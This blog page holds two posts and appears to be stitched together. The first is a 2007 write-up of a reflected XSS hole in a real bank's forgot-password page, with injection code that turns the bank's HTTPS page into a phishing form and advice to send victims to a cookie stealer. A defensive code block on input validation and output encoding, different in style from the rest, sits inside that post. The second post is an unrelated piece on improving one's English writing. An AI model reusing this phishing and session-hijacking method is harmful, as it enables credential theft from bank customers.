Blogeek
where geeks play


Rob Maybank2u with javascript
Published September 5th, 2007 in Security. 0 Comments

I'm back. Now with another evil plan in mind. *grin*

I found an XSS hole in maybank2u online, right in the https-secured section. It seems that Maybank2u uses JavaScript to validate and filter user input on the forgot password page before echoing it back. This can be easily evaded by sending the input not through the textbox but straight in the URL bar. As a result, a user can inject JavaScript code into the page by changing the birthday's date value. Funny, isn't it?

XSS in maybank2u online POC

What can we do with an XSSed site? It's an online banking site, dude, why not set up a phishing site right there? First we need to remove the old content [forgot password form] using getElementsByTagName. Fire up your DOM Inspector in Firefox and you should find that the form is in the 4th table. Replace the form HTML code with the innerHTML command. The whole code that we're going to inject should be something like this.

    oldcontent = document.getElementsByTagName("table")[3];
    oldcontent.innerHTML = '<--phishing code goes here-->';

Convert the string to charCode with String.fromCharCode.

Yatta! A new phishing site hosted by maybank2u itself, at zero cost, and it's https verified. [Tested only in Firefox]

The downside is that the URL is obviously long. Notice that the login form is just an image. I'm lazy, and it would be better if you copied the HTML code from the real page. Keep in mind that the longer your phishing code, the longer the URL will be.

If you don't want to create a phishing site, you can just redirect the victim to a cookie stealer. Set the cookie back to your browser and you'll have 10 minutes login time.

Maybank users, you don't have to worry, since any money transaction needs a TAC code. I told you earlier this is just a proof of concept. Haha.

This article is for educational purposes only. Whatever you do, you're on your own.

To Mr.Fark: This is the better way to phish. Not the lame way that you did last time.
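The root cause described in this post is that input filtering ran only in the browser and the server echoed the value back unencoded. As an added example that is not part of the original post or the bank's code, the code below contrasts that pattern with server-side validation plus HTML output encoding; the field names `dobDay`, `dobMonth` and `dobYear`, the markup and the `bank.example` URL are assumptions.

```javascript
// Added example: field names, markup and helpers are hypothetical, not Maybank2u's code.

// Encode the five characters that let text break out of HTML element or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side allowlist: each part must be 1-4 digits and together form a real calendar date.
function parseBirthDate(params) {
  const parts = [params.dobDay, params.dobMonth, params.dobYear];
  if (!parts.every((p) => typeof p === 'string' && /^\d{1,4}$/.test(p))) return null;
  const [day, month, year] = parts.map(Number);
  if (year < 1900 || year > new Date().getUTCFullYear()) return null;
  const d = new Date(Date.UTC(year, month - 1, day));
  const valid = d.getUTCFullYear() === year && d.getUTCMonth() === month - 1 && d.getUTCDate() === day;
  return valid ? { day, month, year } : null;
}

// Weak pattern: trusts that the browser-side script already filtered the value.
function renderUnsafe(params) {
  return `<input name="dobDay" value="${params.dobDay}">`;
}

// Hardened pattern: reject anything that is not a date, then encode whatever is echoed.
function renderSafe(params) {
  const dob = parseBirthDate(params);
  if (dob === null) {
    return { status: 400, body: '<p>Invalid date of birth.</p>' };
  }
  return { status: 200, body: `<input name="dobDay" value="${escapeHtml(dob.day)}">` };
}

// Constructed request: the value arrives in the query string, so no page script ever saw it.
const url = new URL('https://bank.example/forgot?dobDay=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&dobMonth=9&dobYear=1980');
const params = Object.fromEntries(url.searchParams);

console.log(renderUnsafe(params)); // markup from the request is echoed as-is
console.log(renderSafe(params));   // rejected with status 400, nothing reflected
console.log(renderSafe({ dobDay: '5', dobMonth: '9', dobYear: '1980' }));
```

Validation in the page's own script remains useful for usability, but only the server-side check and the encoding step are security controls.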
Teach me to write
Published August 18th, 2007 in Education. 0 Comments

Remember back in time when I decided to create my first blog, hoping I could improve my English. Starting on that day, I spent most of my free time reading and publishing posts until it became part of my life routine. The problem is, not all bloggers can write well and use correct grammar, including myself. I have to admit that. Reading that kind of writing will just poison your mind and damage your English skills. Sometimes I can't keep myself from laughing when reading a blog with poor grammar. Did they just copy and paste the article into Google translator? I wonder if my readers think the same way about me.

Now I'll tell you my lame technique that I've been using for a long period of time. Every time I write a new post, I'll reread it a few times, paste it into MS Word and scan for spelling errors. I'll use Google to make sure that I'm using the accurate words or phrases. My electronic dictionary and online Thesaurus also come in handy.

I know that some readers don't even care about grammar errors as they are only interested in the content. For me, both are important because the way you write shows the way you think. Plus, if you don't know how to write well, you might mislead the readers with the wrong ideas. Care to share your writing technique?